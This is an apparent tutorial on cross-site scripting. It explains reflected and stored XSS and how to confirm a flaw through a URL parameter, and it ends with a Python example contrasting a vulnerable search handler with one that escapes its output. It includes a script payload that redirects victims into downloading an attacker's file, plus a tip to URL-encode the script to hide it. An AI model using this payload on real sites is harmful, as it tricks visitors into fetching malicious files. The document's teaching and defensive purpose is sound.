The XSS vulnerability, Cross Site Scripting: discover what these vulnerabilities are, the danger they represent and the types of attacks they make possible, from simple user redirection to online file injection!
What is the XSS Vulnerability?
The XSS or Cross Site Scripting vulnerability is one of the most common vulnerabilities on websites.
This flaw can be avoided, but web developers sometimes don't pay enough attention to it and don't sanitize or check their inputs. The flaw appears in web forms, comment sections, or wherever text input is required.
For example, some free WordPress or PrestaShop themes are badly affected by XSS flaws: developers in a hurry to sell a theme that was itself made in a hurry don't care about this problem, which is a real threat to the customers who buy their themes.
This article is a complement to our previous article: How to hack a website?
What are the impacts of the XSS Vulnerability?
It allows the attacker to inject scripts that can compromise the website and lead to the disclosure of confidential information or the theft of cookies, which can end up in account takeover.
A FEW IMPORTANT TERMS BEFORE MOVING FORWARD:
HTTP REQUEST: Simple enough to understand.
Each time you open a web page or fetch a file, your browser sends an HTTP request to the website's server.
The web server handles this HTTP request and responds accordingly.
REQUEST PARAMETERS: A little more complex.
This is where the script is injected on most sites with a common XSS flaw.
Example: http://example.com/test.php?a=1&b=2 In this example “a” and “b” are parameters with the respective values “1” and “2”.
The script is most often injected in the value of the parameter.
XSS Vulnerabilities Types
REFLECTED OR NON-PERSISTENT XSS: This type of XSS vulnerability is quite common.
It's not very dangerous on its own, but combined with social engineering it can be devastating. In this type of XSS flaw, the payload or script is part of the HTTP request or URL.
Nothing is permanently stored on the web server in this type of XSS. It can be used to target a specific person: the victim receives a link to a trusted website, but the link contains the XSS vector/script.
STORED OR PERSISTENT XSS: This type of XSS is the most dangerous.
In this type of XSS vulnerability, the attacker injects a script that remains permanently stored on the web page, so that the malicious script is executed whenever someone visits this page.
This can do a lot of damage.
This XSS flaw can also be used to deface the website (we will talk about this later).
How to find XSS Vulnerabilities on a website?
Now that we have a basic knowledge of XSS, we will go a little further and learn how to identify an XSS flaw on a website.
As you can see on the picture, the site contains an input field.
So, to identify the flaw, enter a simple script in the input field.
The site returns the following response, which confirms that there is an XSS vulnerability on the site.
To make sure, we inject one more script in the search field and look at the result.
This confirms the XSS flaw.
This is a reflected type of XSS, and now the question is how to execute the script from the URL.
We will now analyze the HTTP requests made by the browser when we inject the script. Here are the search parameters.
There are a total of 4 parameters.
We see that the script is injected in the “roll_number” parameter, so if we want the script to be executed from a URL, we'll have to build a URL like this one:
Thus, by opening the URL above, our script is also executed, as shown in the image. Any script can be executed this way.
How to use an XSS Vulnerability to make a visitor download a file?
It will be easy once you understand all of the above.
In the URL we built above, if we replace the script with the following one, the download of your file will start:
<script>document.location="Link of your file"</script>
The advantage is that the victim thinks that the file comes from a trusted website.
You can URL-encode the script to hide it in the URL.
This tutorial is intended for educational purposes, to help protect against this phenomenon, which increasingly affects webmasters who are not very concerned about their security.
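As an added example (not code from the original article), here is the kind of search handler the "roll_number" walkthrough above describes, written once with the parameter reflected raw and once with output encoding, plus a small check that decodes the URL the way the server does, which is why percent-encoding the script hides it from a reader but not from the page. The page templates and the URL are constructed for this example.

```python
# Added example: reflected XSS in a search handler, beside the fixed version,
# and a check that tells the two apart. The parameter name "roll_number" comes
# from the article; the HTML templates and the probe URL are constructed here.
from html import escape
from urllib.parse import parse_qs, urlsplit

# Harmless probe: if its markup comes back unchanged, the page reflects input verbatim.
PROBE = "<b>xss-probe</b>"


def get_param(url: str, name: str) -> str:
    """Extract one query parameter, URL-decoding it as the server would."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(roll_number: str) -> str:
    """Reflected XSS: the raw parameter value is pasted straight into the HTML."""
    return f"<p>Results for roll number: {roll_number}</p>"


def render_fixed(roll_number: str) -> str:
    """Same page with output encoding: <, >, & and quotes become HTML entities."""
    return f"<p>Results for roll number: {escape(roll_number, quote=True)}</p>"


def reflects_unescaped(render, probe: str = PROBE) -> bool:
    """True when the probe's markup survives rendering, i.e. the handler is vulnerable."""
    return probe in render(probe)


if __name__ == "__main__":
    # Constructed URL of the kind the article builds by hand. The value is
    # percent-encoded, so nothing looks like a tag in the address bar, but the
    # server decodes it before the handler ever sees it.
    url = "http://example.com/search.php?roll_number=%3Cb%3Exss-probe%3C%2Fb%3E&page=1"
    value = get_param(url, "roll_number")
    print("decoded parameter:", value)
    print("vulnerable handler reflects markup:", reflects_unescaped(render_vulnerable))
    print("fixed handler reflects markup:     ", reflects_unescaped(render_fixed))
```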